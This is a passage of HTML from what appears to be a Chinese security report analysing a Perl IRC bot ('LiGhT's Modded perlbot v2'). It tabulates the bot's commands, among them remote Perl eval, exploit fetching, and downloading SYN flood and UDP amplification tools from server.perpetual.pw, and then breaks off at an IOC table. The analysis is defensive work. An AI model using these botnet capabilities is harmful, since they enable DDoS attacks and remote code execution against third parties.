style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u reset</span></span></p></td><td data-colwidth="225" width="225" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">断开重新连接</span></font></span></p></td></tr><tr><td data-colwidth="626" width="626" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u nick &lt;name&gt;</span></span></p></td><td data-colwidth="225" width="225" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">更换昵称</span></font></span></p></td></tr><tr><td data-colwidth="626" width="626" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u op/deop/halfop/dehalfop/voice/devoice/owner/deowner &lt;who&gt;</span></span></p></td><td data-colwidth="225" width="225" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">IRC 频道权限管理</span></span></p></td></tr><tr><td data-colwidth="626" width="626" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u connect &lt;server&gt; &lt;nick&gt;</span></span></p></td><td data-colwidth="225" width="225" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">连接到其他</span></font><span leaf=""> IRC 服务器</span></span></p></td></tr><tr><td data-colwidth="626" width="626" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u raw &lt;data&gt;</span></span></p></td><td data-colwidth="225" width="225" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">发送原始</span></font><span leaf=""> IRC 数据</span></span></p></td></tr><tr><td data-colwidth="626" width="626" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u eval &lt;code&gt;</span></span></p></td><td data-colwidth="225" width="225" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">直接执行</span></font><span leaf=""> Perl 代码!</span></span></p></td></tr></tbody></table><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">信息/帮助命令</span></span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="550" width="550" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">命令</span></font></span></b></p></td><td data-colwidth="301" width="301" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">功能</span></font></span></b></p></td></tr><tr><td data-colwidth="550" width="550" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u version</span></span></p></td><td data-colwidth="301" width="301" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">显示版本</span></font><font face="宋体"><span leaf="">→ &#34;LiGhT&#39;s Modded perlbot v2&#34;</span></font></span></p></td></tr><tr><td data-colwidth="550" width="550" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u packetstorm</span></span></p></td><td data-colwidth="301" width="301" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">从</span></font><span leaf=""> packetstormsecurity.org 获取最新漏洞</span></span></p></td></tr><tr><td data-colwidth="550" width="550" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u milw0rm</span></span></p></td><td data-colwidth="301" width="301" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">从</span></font><span leaf=""> milw0rm.com 获取最新 Exploit</span></span></p></td></tr><tr><td data-colwidth="550" width="550" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u extras</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">+ </span></span><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u install-syn</span></span></p></td><td data-colwidth="301" width="301" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">从</span></font><span leaf=""> server.perpetual.pw 下载编译 SYN Flood 工具</span></span></p></td></tr><tr><td data-colwidth="550" width="550" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u install-50x</span></span></p></td><td data-colwidth="301" width="301" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">从同一服务器下载</span></font><span leaf=""> 50x UDP amplification 工具</span></span></p></td></tr><tr><td data-colwidth="550" width="550" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u commands</span></span></p></td><td data-colwidth="301" width="301" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">列出所有可用命令</span></font></span></p></td></tr><tr><td data-colwidth="550" width="550" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u help/ddos/irc/flooding/hacking/news/linuxhelp</span></span></p></td><td data-colwidth="301" width="301" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">分类帮助</span></font></span></p></td></tr></tbody></table></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041920" src="https://wechat2rss.xlab.app/img-proxy/?k=11b6c9d5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxQicLy1FX9VTYFMh5tf9d4biaEP9BwPBpNPvS9HBz6emtzpDLOXRoqIPo3QryVboETiaMAjIea8U4QEicSpXYXiaia0EHeQIibCSicZsp4%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">攻击攻击全景图</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="1.4" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100041928" src="https://wechat2rss.xlab.app/img-proxy/?k=813aa94f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxT7xeZbxJ4ibiaj03BZvwF5Lib0eQokdPn4MZsueftlX91jZj3pV1hiaPibBxxLKic1GbUZEGOd8ufJ3WqTSSjo7khiarLd33UKcyeicicc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041923" src="https://wechat2rss.xlab.app/img-proxy/?k=ee566420&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxTfNOEbdDDtszl9VC1DsubibMZmNIlm7sYrxw8Gsoniaib90rtXhQ1Fscd4MuPjS3wSFb0wzAYGF2nq30kwyTI0PgEUR5xTbC6Zs8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="text-align: justify;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">IOCs</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><table style="border-collapse:collapse;width:424.1000pt;margin-left:5.4000pt;border:none;mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="54" width="54" valign="top" style="padding: 0pt 3pt 0pt 0pt;border-width: medium 1.5pt medium medium;border-style: none solid none none;border-color: currentcolor windowtext currentcolor currentcolor;background: rgb(247, 247, 247);"><p style="text-align:right;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(175,175,175);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">1</span></span></p><p style="text-align:right;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(175,175,175);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">2</span></span></p><p style="text-align:right;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(175,175,175);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">3</span></span></p><p style="text-align:right;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(175,175,175);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">4</span></span></p><p style="text-align:right;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(175,175,175);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">5</span></span></p><p style="text-align:right;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(175,175,175);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">6</span></span></p><p style="text-align:right;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(175,175,175);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">7</span></span></p><p style="text-align:right;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-pagination:widow-orphan;vertical-align:baseline;mso-line-height-alt:12pt;background:rgb(255,255,255);"><span style="font-family:Consolas;color:rgb(175,175,175);letter-spacing:0.0000pt;font-weight:normal;text-transform:none;font-style:normal;font-size:9.5000pt;mso-font-kerning:0.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><span leaf="">8</span></span></p><p 